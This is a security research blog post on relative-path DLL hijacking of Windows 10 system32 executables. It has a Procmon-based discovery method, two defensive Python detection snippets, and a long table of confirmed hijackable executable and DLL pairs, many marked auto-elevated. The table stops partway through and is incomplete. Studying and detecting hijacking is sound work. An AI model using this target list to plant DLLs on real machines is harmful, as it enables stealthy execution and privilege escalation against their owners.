DLL Hijacking
First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. Terms such as DLL Search Order Hijacking, DLL Load Order Hijacking, DLL Spoofing, DLL Injection and DLL Side-Loading are often (mistakenly) used to say the same. At best such terms describe specific cases of DLL hijacking, but they are often used interchangeably and therefore incorrectly. As an umbrella term, DLL hijacking is more accurate, as DLL hijacking always involves a DLL taking over from a legitimate DLL.
Attackers have been seen to use DLL hijacking in different ways and for different reasons. Motives include execution (executing malicious code through a trusted executable may be less likely to set off alarm bells, and in some cases even bypasses application whitelist features such as AppLocker [1]), obtaining persistence (if the target application is pre-installed and runs regularly, so will the malicious code) and privilege escalation (if the target application runs under elevated permissions, so will the malicious code).
There is a variety of approaches to choose from, with success depending on how the application is configured to load its required DLLs. Possible approaches include:
- DLL replacement: replace a legitimate DLL with an evil DLL. This can be combined with DLL Proxying [2], which ensures all functionality of the original DLL remains intact.
- DLL search order hijacking: DLLs specified by an application without a path are searched for in fixed locations in a specific order [3]. Hijacking the search order takes place by putting the evil DLL in a location that is searched before the location of the actual DLL. This sometimes includes the working directory of the target application.
- Phantom DLL hijacking: drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load [4].
- DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local files to include the folder containing the evil DLL [5, 6].
- WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading [7].
- Relative path DLL Hijacking: copy (and optionally rename) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with (Signed) Binary Proxy Execution [8]. A variation of this is (somewhat oxymoronically called) ‘bring your own LOLbin’ [9], in which the legitimate application is brought with the evil DLL (rather than copied from the legitimate location on the victim’s machine).
Finding vulnerable executables
The biggest challenge is to find a vulnerable executable that can be exploited under default user permissions. When targeting pre-installed system executables on Windows, that typically excludes the first option, whilst any folders eligible in options 2 and 3 have to be user writeable, as should the files and folder in options 4 and 5. This is usually not the case.
That leaves us with option six, the weakest variant, which the remainder of this post will focus on. Although usually unsuitable to obtain persistence or privilege escalation, it is often seen in the wild. Take OceanLotus/APT32, who at the end of 2019 were observed to use a legitimate rekeywiz.exe alongside a malicious duser.dll [10, 11]. In this case, the malware embedded the legitimate software and dropped it to disk, adopting the ‘bring your own LOLbin’ approach (another way of achieving the same would have been to copy the legitimate executable from the \system32\ folder, assuming the executable hasn’t been patched yet).
To prevent new versions of this technique from being successful, it is worthwhile identifying executables that are vulnerable to this kind of DLL hijacking. This will provide red teamers with new means for execution, but more importantly, it will allow threat hunters and defenders to take appropriate measures to detect and prevent it.
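As an added illustration of the detection side (not code from the original post), the sketch below flags the relative path variant in image-load telemetry: a system32 executable name running from outside the Windows system folders and loading a DLL from its own folder. The events are constructed samples whose field names follow Sysmon's image-load event (Event ID 7); KNOWN_PAIRS holds a few executable/DLL pairs named on this page, and the function names and the folders other than the Downloads path are assumptions.

```python
import ntpath

# Folders a pre-installed Windows executable is expected to run from.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# A few (executable, DLL) pairs named on this page, lower-cased; extend as needed.
KNOWN_PAIRS = {
    ("rekeywiz.exe", "duser.dll"),
    ("winsat.exe", "dxgi.dll"),
    ("fodhelper.exe", "cryptbase.dll"),
    ("computerdefaults.exe", "propsys.dll"),
}
SYSTEM_EXE_NAMES = {exe for exe, _ in KNOWN_PAIRS}

# Constructed sample events (field names as in Sysmon Event ID 7, "Image loaded").
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\winsat.exe",
     "ImageLoaded": r"C:\Windows\System32\dxgi.dll"},
    # A process also maps its own executable; this must not be flagged.
    {"Image": r"C:\Users\wietze\Downloads\winsat.exe",
     "ImageLoaded": r"C:\Users\wietze\Downloads\winsat.exe"},
    {"Image": r"C:\Users\wietze\Downloads\winsat.exe",
     "ImageLoaded": r"C:\Users\wietze\Downloads\dxgi.dll"},
    {"Image": r"C:\Users\wietze\Downloads\winsat.exe",
     "ImageLoaded": r"C:\Windows\System32\d3d11.dll"},
    {"Image": r"C:\Users\Public\rekeywiz.exe",
     "ImageLoaded": r"C:\Users\Public\duser.dll"},
    {"Image": r"C:\Temp\fodhelper.exe",
     "ImageLoaded": r"C:\Temp\helper.dll"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\dxgi.dll"},
]


def _in_system_dir(directory):
    """True if the (lower-cased) directory is a system folder or below one."""
    return any(directory == d or directory.startswith(d + "\\") for d in SYSTEM_DIRS)


def classify(event):
    """Return a verdict string for a suspicious image load, or None."""
    exe_dir, exe_name = ntpath.split(event["Image"].lower())
    dll_dir, dll_name = ntpath.split(event["ImageLoaded"].lower())
    # Only system executable names that run from a non-system folder matter.
    if exe_name not in SYSTEM_EXE_NAMES or _in_system_dir(exe_dir):
        return None
    # The hijack shows up as a DLL mapped from the executable's own folder.
    if not dll_name.endswith(".dll") or dll_dir != exe_dir:
        return None
    if (exe_name, dll_name) in KNOWN_PAIRS:
        return "confirmed-pair"
    return "relocated-binary-local-dll"


def hunt(events):
    """Return (verdict, Image, ImageLoaded) for every flagged event."""
    findings = []
    for event in events:
        verdict = classify(event)
        if verdict:
            findings.append((verdict, event["Image"], event["ImageLoaded"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

A renamed copy of the executable evades the name match; joining on the OriginalFileName field of the process-creation event covers that case.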
Approach
To keep things focussed, let’s limit ourselves to the executables present by default in c:\windows\system32\. On the tested Windows 10 v1909 instance, this comprised a total of 616 executables, or 613 if you only consider signed applications.
To monitor which DLLs each process attempts to load, we’ll use the well-known Procmon [12] tool. The approach taken is therefore: (1) copy trusted executable to a user-writable location; (2) run copied executable; (3) use Procmon to identify DLLs looked for in user writable location.
Procmon capturing DLL queries by a copy of winsat.exe, located in c:\users\wietze\downloads\.
This allows us to identify all DLLs queried by each application, which will be all potential hijackable DLL candidates. But it does not automatically follow that all of these are also loaded (and therefore executed). The most reliable way to find out which DLLs are properly loaded is to compile our own version of the DLL, and make it write to a unique file upon successfully loading. If we then repeat the above approach for all target executables and DLLs, it will result in a collection of files that tells us which DLLs are confirmed vulnerable to DLL hijacking.
Compiling custom versions of existing DLLs is more challenging than it may sound, as a lot of executables will not load such DLLs if procedures or entry points are missing. Tools such as DLL Export Viewer [13] can be used to enumerate all external function names and ordinals of the legitimate DLLs. Ensuring that our compiled DLL follows the same format will maximise the chances of it being loaded successfully.
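A sketch of step (3) as an added example (not the author's code, which is on GitHub): it reads a Procmon CSV export and lists the DLL names the copied executable probed in its own folder, together with where each one was eventually loaded from. The CSV rows are constructed, example.dll and the function name are hypothetical, and the column names assume Procmon's default export.

```python
import csv
import io
import ntpath

# Constructed sample in Procmon's default CSV export layout.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.10","winsat.exe","4242","RegOpenKey","HKLM\System\CurrentControlSet\Control\Session Manager","SUCCESS",""
"10:01:02.11","winsat.exe","4242","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS",""
"10:01:02.12","winsat.exe","4242","CreateFile","C:\Users\wietze\Downloads\dxgi.dll","NAME NOT FOUND",""
"10:01:02.13","winsat.exe","4242","Load Image","C:\Windows\System32\dxgi.dll","SUCCESS",""
"10:01:02.14","winsat.exe","4242","CreateFile","C:\Users\wietze\Downloads\winmm.dll","NAME NOT FOUND",""
"10:01:02.15","winsat.exe","4242","Load Image","C:\Windows\System32\winmm.dll","SUCCESS",""
"10:01:02.16","winsat.exe","4242","CreateFile","C:\Users\wietze\Downloads\example.dll","NAME NOT FOUND",""
"10:01:02.17","explorer.exe","1234","CreateFile","C:\Users\wietze\Downloads\other.dll","NAME NOT FOUND",""
'''


def triage(csv_text, process_name, exe_dir):
    """Map each DLL name probed in exe_dir to the path it was later loaded from.

    The value stays None when no matching "Load Image" row follows, i.e. the
    DLL was queried but there is no evidence in the trace that it was loaded.
    """
    exe_dir = exe_dir.lower().rstrip("\\")
    process_name = process_name.lower()
    probed = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name:
            continue
        directory, name = ntpath.split(row["Path"].lower())
        if not name.endswith(".dll"):
            continue
        missed_locally = (
            row["Operation"] == "CreateFile"
            and row["Result"] == "NAME NOT FOUND"
            and directory == exe_dir
        )
        if missed_locally:
            probed.setdefault(name, None)
        elif row["Operation"] == "Load Image" and name in probed:
            probed[name] = row["Path"].lower()
    return probed


if __name__ == "__main__":
    result = triage(SAMPLE_CSV, "winsat.exe", r"C:\Users\wietze\Downloads")
    for dll, loaded_from in result.items():
        print(dll, "->", loaded_from or "queried only, no load seen")
```

A name that is probed but never appears in a Load Image row is the case the paragraph above warns about: being queried is not the same as being loaded.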
Sample C code for our own version of dxgi.dll, which showed up in the Procmon recording of winsat.exe.
In summary, the approach taken is:
![3Anaym6.png!web](https://img0.tuicool.com/3Anaym6.png!web)
The full code with a more thorough, technical explanation can be found on GitHub [14].
Confirmed DLL Hijack candidates
The following table lists all executables in c:\windows\system32 on Windows 10 v1909 that are vulnerable to the ‘relative path DLL Hijack’ variant of DLL Hijacking. Next to each executable is one or more DLLs that can be hijacked, together with the procedures of that DLL that are called. As explained in the previous section, these are not mere theoretical targets; these are tested and confirmed to be working. The list comprises 287 executables and 263 unique DLLs.
| Auto-elevated | Executable | DLL | Procedure |
| --- | --- | --- | --- |
| ✔ | bthudtask.exe | DEVOBJ.dll | DllMain |
| ✔ | computerdefaults.exe | CRYPTBASE.DLL | DllMain |
| ✔ | computerdefaults.exe | edputil.dll | DllMain |
| ✔ | computerdefaults.exe | edputil.dll | EdpGetIsManaged |
| ✔ | computerdefaults.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
| ✔ | computerdefaults.exe | MLANG.dll | DllMain |
| ✔ | computerdefaults.exe | PROPSYS.dll | DllMain |
| ✔ | computerdefaults.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔ | computerdefaults.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔ | computerdefaults.exe | Secur32.dll | DllMain |
| ✔ | computerdefaults.exe | SSPICLI.DLL | DllMain |
| ✔ | computerdefaults.exe | SSPICLI.DLL | GetUserNameExW |
| ✔ | computerdefaults.exe | WININET.dll | DllMain |
| ✔ | computerdefaults.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
| ✔ | dccw.exe | ColorAdapterClient.dll | DllMain |
| ✔ | dccw.exe | dxva2.dll | DllMain |
| ✔ | dccw.exe | mscms.dll | DccwReleaseDisplayProfileAssociationList |
| ✔ | dccw.exe | mscms.dll | DllMain |
| ✔ | dccw.exe | mscms.dll | WcsGetCalibrationManagementState |
| ✔ | dccw.exe | mscms.dll | WcsSetCalibrationManagementState |
| ✔ | dccw.exe | USERENV.dll | DllMain |
| ✔ | easinvoker.exe | AUTHZ.dll | DllMain |
| ✔ | easinvoker.exe | netutils.dll | DllMain |
| ✔ | easinvoker.exe | samcli.dll | DllMain |
| ✔ | easinvoker.exe | SAMLIB.dll | DllMain |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | DllMain |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | FlushInProcTraceSession |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcLogger |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceFlushTrigger |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceSession |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcLogger |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcTraceSession |
| ✔ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | StopInProcTraceSession |
| ✔ | easpolicymanagerbrokerhost.exe | policymanager.dll | DllMain |
| ✔ | fodhelper.exe | CRYPTBASE.DLL | DllMain |
| ✔ | fodhelper.exe | edputil.dll | DllMain |
| ✔ | fodhelper.exe | edputil.dll | EdpGetIsManaged |
| ✔ | fodhelper.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
| ✔ | fodhelper.exe | MLANG.dll | DllMain |
| ✔ | fodhelper.exe | PROPSYS.dll | DllMain |
| ✔ | fodhelper.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔ | fodhelper.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔ | fodhelper.exe | Secur32.dll | DllMain |
| ✔ | fodhelper.exe | SSPICLI.DLL | DllMain |
| ✔ | fodhelper.exe | SSPICLI.DLL | GetUserNameExW |
| ✔ | fodhelper.exe | WININET.dll | DllMain |
| ✔ | fodhelper.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
| ✔ | fsavailux.exe | DEVOBJ.dll | DllMain |
| ✔ | fxsunatd.exe | FXSAPI.dll | DllMain |
| ✔ | fxsunatd.exe | FXSAPI.dll | FaxConnectFaxServerW |
| ✔ | fxsunatd.exe | IPHLPAPI.DLL | DllMain |
| ✔ | fxsunatd.exe | PROPSYS.dll | DllMain |
| ✔ | immersivetpmvscmgrsvr.exe | DEVOBJ.dll | DllMain |
| ✔ | iscsicli.exe | DEVOBJ.dll | DllMain |
| ✔ | iscsicli.exe | ISCSIDSC.dll | DllMain |
| ✔ | iscsicli.exe | ISCSIDSC.dll | GetIScsiVersionInformation |
| ✔ | iscsicli.exe | ISCSIUM.dll | DiscpAllocMemory |
| ✔ | iscsicli.exe | ISCSIUM.dll | DiscpRegisterHeap |
| ✔ | iscsicli.exe | ISCSIUM.dll | DllMain |
| ✔ | iscsicli.exe | WMICLNT.dll | DllMain |
| ✔ | mdsched.exe | bcd.dll | DllMain |
| ✔ | mschedexe.exe | MaintenanceUI.dll | DllMain |
| ✔ | msconfig.exe | ATL.DLL | AtlModuleInit |
| ✔ | msconfig.exe | ATL.DLL | AtlModuleRegisterClassObjects |
| ✔ | msconfig.exe | ATL.DLL | DllMain |
| ✔ | msconfig.exe | bcd.dll | DllMain |
| ✔ | msdt.exe | ATL.DLL | DllMain |
| ✔ | msdt.exe | Cabinet.dll | DllMain |
| ✔ | msdt.exe | SSPICLI.DLL | DllMain |
| ✔ | msdt.exe | UxTheme.dll | DllMain |
| ✔ | msdt.exe | wer.dll | DllMain |
| ✔ | msdt.exe | WINHTTP.dll | DllMain |
| ✔ | multidigimon.exe | NInput.dll | DllMain |
| ✔ | netplwiz.exe | CRYPTBASE.dll | DllMain |
| ✔ | netplwiz.exe | DSROLE.dll | DllMain |
| ✔ | netplwiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation |
| ✔ | netplwiz.exe | NETPLWIZ.dll | DllMain |
| ✔ | netplwiz.exe | NETPLWIZ.dll | UsersRunDllW |
| ✔ | netplwiz.exe | netutils.dll | DllMain |
| ✔ | netplwiz.exe | netutils.dll | NetApiBufferFree |
| ✔ | netplwiz.exe | PROPSYS.dll | DllMain |
| ✔ | netplwiz.exe | samcli.dll | DllMain |
| ✔ | netplwiz.exe | samcli.dll | NetUserGetInfo |
| ✔ | netplwiz.exe | SAMLIB.dll | DllMain |
| ✔ | netplwiz.exe | SAMLIB.dll | SamConnect |
| ✔ | netplwiz.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer |
| ✔ | netplwiz.exe | SAMLIB.dll | SamFreeMemory |
| ✔ | optionalfeatures.exe | DUI70.dll | DllMain |
| ✔ | optionalfeatures.exe | DUI70.dll | InitProcessPriv |
| ✔ | optionalfeatures.exe | DUI70.dll | RegisterBaseControls |
| ✔ | optionalfeatures.exe | DUI70.dll | RegisterCommonControls |
| ✔ | optionalfeatures.exe | DUI70.dll | RegisterExtendedControls |
| ✔ | optionalfeatures.exe | DUI70.dll | RegisterStandardControls |
| ✔ | optionalfeatures.exe | msi.dll | DllMain |
| ✔ | optionalfeatures.exe | OLEACC.dll | CreateStdAccessibleObject |
| ✔ | optionalfeatures.exe | OLEACC.dll | DllMain |
| ✔ | optionalfeatures.exe | OLEACC.dll | GetRoleTextW |
| ✔ | optionalfeatures.exe | osbaseln.dll | CloseOsBaseline |
| ✔ | optionalfeatures.exe | osbaseln.dll | DllMain |
| ✔ | optionalfeatures.exe | osbaseln.dll | OpenOsBaseline |
| ✔ | optionalfeatures.exe | PROPSYS.dll | DllMain |
| ✔ | perfmon.exe | ATL.DLL | DllMain |
| ✔ | perfmon.exe | credui.dll | DllMain |
| ✔ | perfmon.exe | SspiCli.dll | DllMain |
| ✔ | printui.exe | IPHLPAPI.DLL | DllMain |
| ✔ | printui.exe | printui.dll | DllMain |
| ✔ | printui.exe | printui.dll | PrintUIEntryW |
| ✔ | printui.exe | PROPSYS.dll | DllMain |
| ✔ | printui.exe | puiapi.dll | DllMain |
| ✔ | recdisc.exe | bcd.dll | DllMain |
| ✔ | recdisc.exe | Cabinet.dll | DllMain |
| ✔ | recdisc.exe | ReAgent.dll | DllMain |
| ✔ | rstrui.exe | bcd.dll | DllMain |
| ✔ | rstrui.exe | ktmw32.dll | DllMain |
| ✔ | rstrui.exe | SPP.dll | DllMain |
| ✔ | rstrui.exe | SPP.dll | SxTracerGetThreadContextRetail |
| ✔ | rstrui.exe | SRCORE.dll | DllMain |
| ✔ | rstrui.exe | SRCORE.dll | SrFreeRestoreStatus |
| ✔ | rstrui.exe | VSSAPI.DLL | DllMain |
| ✔ | rstrui.exe | VssTrace.DLL | DllMain |
| ✔ | rstrui.exe | wer.dll | DllMain |
| ✔ | sdclt.exe | bcd.dll | DllMain |
| ✔ | sdclt.exe | Cabinet.dll | DllMain |
| ✔ | sdclt.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag |
| ✔ | sdclt.exe | CLDAPI.dll | DllMain |
| ✔ | sdclt.exe | CRYPTBASE.DLL | DllMain |
| ✔ | sdclt.exe | edputil.dll | DllMain |
| ✔ | sdclt.exe | edputil.dll | EdpGetIsManaged |
| ✔ | sdclt.exe | FLTLIB.DLL | DllMain |
| ✔ | sdclt.exe | PROPSYS.dll | DllMain |
| ✔ | sdclt.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔ | sdclt.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔ | sdclt.exe | ReAgent.dll | DllMain |
| ✔ | sdclt.exe | SPP.dll | DllMain |
| ✔ | sdclt.exe | SPP.dll | SxTracerGetThreadContextRetail |
| ✔ | sdclt.exe | SspiCli.dll | DllMain |
| ✔ | sdclt.exe | SspiCli.dll | GetUserNameExW |
| ✔ | sdclt.exe | UxTheme.dll | DllMain |
| ✔ | sdclt.exe | VSSAPI.DLL | DllMain |
| ✔ | sdclt.exe | VssTrace.DLL | DllMain |
| ✔ | sdclt.exe | wer.dll | DllMain |
| ✔ | sdclt.exe | WTSAPI32.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | bcd.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | credui.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | DNSAPI.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | DSROLE.DLL | DllMain |
| ✔ | systempropertiesadvanced.exe | DSROLE.DLL | DsRoleGetPrimaryDomainInformation |
| ✔ | systempropertiesadvanced.exe | LOGONCLI.DLL | DllMain |
| ✔ | systempropertiesadvanced.exe | netid.dll | CreateNetIDPropertyPage |
| ✔ | systempropertiesadvanced.exe | netid.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | NETUTILS.DLL | DllMain |
| ✔ | systempropertiesadvanced.exe | SRVCLI.DLL | DllMain |
| ✔ | systempropertiesadvanced.exe | WINBRAND.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | WINSTA.dll | DllMain |
| ✔ | systempropertiesadvanced.exe | WKSCLI.DLL | DllMain |
| ✔ | systempropertiescomputername.exe | bcd.dll | DllMain |
| ✔ | systempropertiescomputername.exe | WINSTA.dll | DllMain |
| ✔ | systempropertiesdataexecutionprevention.exe | bcd.dll | DllMain |
| ✔ | systempropertiesdataexecutionprevention.exe | WINSTA.dll | DllMain |
| ✔ | systempropertieshardware.exe | bcd.dll | DllMain |
| ✔ | systempropertieshardware.exe | WINSTA.dll | DllMain |
| ✔ | systempropertiesprotection.exe | bcd.dll | DllMain |
| ✔ | systempropertiesprotection.exe | WINSTA.dll | DllMain |
| ✔ | systempropertiesremote.exe | bcd.dll | DllMain |
| ✔ | systempropertiesremote.exe | WINSTA.dll | DllMain |
| ✔ | systemreset.exe | bcd.dll | BcdCloseObject |
| ✔ | systemreset.exe | bcd.dll | BcdCloseStore |
| ✔ | systemreset.exe | bcd.dll | BcdFlushStore |
| ✔ | systemreset.exe | bcd.dll | BcdGetElementData |
| ✔ | systemreset.exe | bcd.dll | BcdOpenObject |
| ✔ | systemreset.exe | bcd.dll | BcdOpenStore |
| ✔ | systemreset.exe | bcd.dll | DllMain |
| ✔ | systemreset.exe | Cabinet.dll | DllMain |
| ✔ | systemreset.exe | d3d10warp.dll | DllMain |
| ✔ | systemreset.exe | d3d10warp.dll | OpenAdapter10_2 |
| ✔ | systemreset.exe | d3d11.dll | D3D11CreateDevice |
| ✔ | systemreset.exe | d3d11.dll | DllMain |
| ✔ | systemreset.exe | dbgcore.DLL | DllMain |
| ✔ | systemreset.exe | DismApi.DLL | DllMain |
| ✔ | systemreset.exe | dxgi.dll | CreateDXGIFactory1 |
| ✔ | systemreset.exe | dxgi.dll | DllMain |
| ✔ | systemreset.exe | FVEAPI.dll | DllMain |
| ✔ | systemreset.exe | FVEAPI.dll | FveGetStatus |
| ✔ | systemreset.exe | FVEAPI.dll | FveOpenVolumeW |
| ✔ | systemreset.exe | ReAgent.dll | DllMain |
| ✔ | systemreset.exe | ReAgent.dll | WinReGetConfig |
| ✔ | systemreset.exe | ResetEngine.dll | DllMain |
| ✔ | systemreset.exe | ResetEngine.dll | ResetCreateSession |
| ✔ | systemreset.exe | ResetEngine.dll | ResetReleaseSession |
| ✔ | systemreset.exe | ResetEngine.dll | ResetTraceClientInfo |
| ✔ | systemreset.exe | ResetEngine.dll | ResetValidateScenario |
| ✔ | systemreset.exe | tbs.dll | DllMain |
| ✔ | systemreset.exe | VSSAPI.DLL | DllMain |
| ✔ | systemreset.exe | VssTrace.DLL | DllMain |
| ✔ | systemreset.exe | WDSCORE.dll | ConstructPartialMsgVW |
| ✔ | systemreset.exe | WDSCORE.dll | CurrentIP |
| ✔ | systemreset.exe | WDSCORE.dll | DllMain |
| ✔ | systemreset.exe | WDSCORE.dll | WdsInitialize |
| ✔ | systemreset.exe | WDSCORE.dll | WdsSetupLogMessageW |
| ✔ | systemreset.exe | WIMGAPI.DLL | DllMain |
| ✔ | systemreset.exe | WIMGAPI.DLL | WIMCreateFile |
| ✔ | systemreset.exe | WINHTTP.dll | DllMain |
| ✔ | systemreset.exe | WOFUTIL.dll | DllMain |
| ✔ | systemreset.exe | XmlLite.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | AppXDeploymentClient.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | Bcp47Langs.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | DEVRTL.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | DismApi.DLL | DllMain |
| ✔ | systemsettingsadminflows.exe | DNSAPI.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | FirewallAPI.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | fwbase.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionCreate |
| ✔ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionDestroy |
| ✔ | systemsettingsadminflows.exe | logoncli.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | netutils.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | newdev.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | PROPSYS.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | samcli.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | SspiCli.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | StateRepository.Core.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | SystemSettingsThresholdAdminFlowUI.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | timesync.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | USERENV.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | WINBRAND.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | wkscli.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | Wldp.dll | DllMain |
| ✔ | systemsettingsadminflows.exe | WTSAPI32.dll | DllMain |
| ✔ | taskmgr.exe | credui.dll | DllMain |
| ✔ | taskmgr.exe | d3d11.dll | DllMain |
| ✔ | taskmgr.exe | d3d12.dll | DllMain |
| ✔ | taskmgr.exe | dxgi.dll | DllMain |
| ✔ | taskmgr.exe | pdh.dll | DllMain |
| ✔ | taskmgr.exe | UxTheme.dll | DllMain |
| ✔ | tcmsetup.exe | TAPI32.dll | DllMain |
| ✔ | winsat.exe | d3d10_1.dll | DllMain |
| ✔ | winsat.exe | d3d10_1core.dll | DllMain |
| ✔ | winsat.exe | d3d10.dll | DllMain |
| ✔ | winsat.exe | d3d10core.dll | DllMain |
| ✔ | winsat.exe | d3d11.dll | DllMain |
| ✔ | winsat.exe | dxgi.dll | DllMain |
| ✔ | winsat.exe | winmm.dll | DllMain |
| ✔ | wsreset.exe | licensemanagerapi.dll | DllMain |
| ✔ | wsreset.exe | licensemanagerapi.dll | Reset |
| ✔ | wsreset.exe | wevtapi.dll | DllMain |
| ✔ | wusa.exe | dpx.dll | DllMain |
| ✔ | wusa.exe | WTSAPI32.dll | DllMain |
| ❌ | agentservice.exe | ACTIVEDS.dll | DllMain |
| ❌ | agentservice.exe | adsldpc.dll | DllMain |
| ❌ | agentservice.exe | FLTLIB.DLL | DllMain |
| ❌ | applytrustoffline.exe | mintdh.dll | DllMain |
| ❌ | applytrustoffline.exe | mintdh.dll | TdhpSetWbemExtensionBlock |
| ❌ | applytrustoffline.exe | StateRepository.Core.dll | DllMain |
| ❌ | arp.exe | IPHLPAPI.DLL | DllMain |
| ❌ | arp.exe | snmpapi.dll | DllMain |
| ❌ | at.exe | cryptdll.dll | DllMain |
| ❌ | at.exe | netutils.dll | DllMain |
| ❌ | at.exe | NtlmShared.dll | DllMain |
| ❌ | at.exe | schedcli.dll | DllMain |
| ❌ | at.exe | schedcli.dll | NetScheduleJobEnum |
| ❌ | at.exe | sspicli.dll | DllMain |
| ❌ | at.exe | sspicli.dll | InitSecurityInterfaceW |
| ❌ | auditpol.exe | auditpolcore.dll | AdtEnableSinglePrivilege |
| ❌ | auditpol.exe | auditpolcore.dll | AuditPolicyData_DeleteAuditDataInstance |
| ❌ | auditpol.exe | auditpolcore.dll | DllMain |
| ❌ | auditpol.exe | auditpolcore.dll | LoadFormatStringAndPrintToConsole |
| ❌ | baaupdate.exe | FVEAPI.dll | DllMain |
| ❌ | bdechangepin.exe | FVEAPI.dll | DllMain |
| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetAuthMethodInformation |
| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetStatus |
| ❌ | bdechangepin.exe | FVEAPI.dll | FveOpenVolumeW |
| ❌ | bdeuisrv.exe | USERENV.dll | DllMain |
| ❌ | bdeuisrv.exe | WTSAPI32.dll | DllMain |
| ❌ | bioiso.exe | iumbase.DLL | DllMain |
| ❌ | bootim.exe | bcd.dll | BcdGetElementData |
| ❌ | bootim.exe | bcd.dll | BcdOpenObject |
| ❌ | bootim.exe | bcd.dll | BcdOpenSystemStore |
| ❌ | bootim.exe | bcd.dll | BcdQueryObject |
| ❌ | bootim.exe | bcd.dll | DllMain |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateBareMetalRecoveryButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateBootableOSButtonCollection |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateCloudRecoveryButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateDefaultOSButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateDeviceListButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateDirectFactoryResetButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateOSListButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateRecoveryToolsListButton |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateSelectOSPage |
| ❌ | bootim.exe | BootMenuUX.DLL | CreateShutdownButton |
| ❌ | bootim.exe | BootMenuUX.DLL | DllMain |
| ❌ | bootim.exe | Cabinet.dll | DllMain |
| ❌ | bootim.exe | dbghelp.dll | DllMain |
| ❌ | bootim.exe | DismApi.DLL | DllMain |
| ❌ | bootim.exe | FLTLIB.DLL | DllMain |
| ❌ | bootim.exe | OLEACC.dll | DllMain |
| ❌ | bootim.exe | OLEACC.dll | GetRoleTextW |
| ❌ | bootim.exe | PROPSYS.dll | DllMain |
| ❌ | bootim.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ❌ | bootim.exe | ReAgent.dll | DllMain |
| ❌ | bootim.exe | ReAgent.dll | WinReGetConfig |
| ❌ | bootim.exe | ResetEng.dll | DllMain |
| ❌ | bootim.exe | tbs.dll | DllMain |
| ❌ | bootim.exe | VirtDisk.dll | DllMain |
| ❌ | bootim.exe | VSSAPI.DLL | DllMain |
| ❌ | bootim.exe | VssTrace.DLL | DllMain |
| ❌ | bootim.exe | WDSCORE.dll | ConstructPartialMsgVW |
| ❌ | bootim.exe | WDSCORE.dll | CurrentIP |
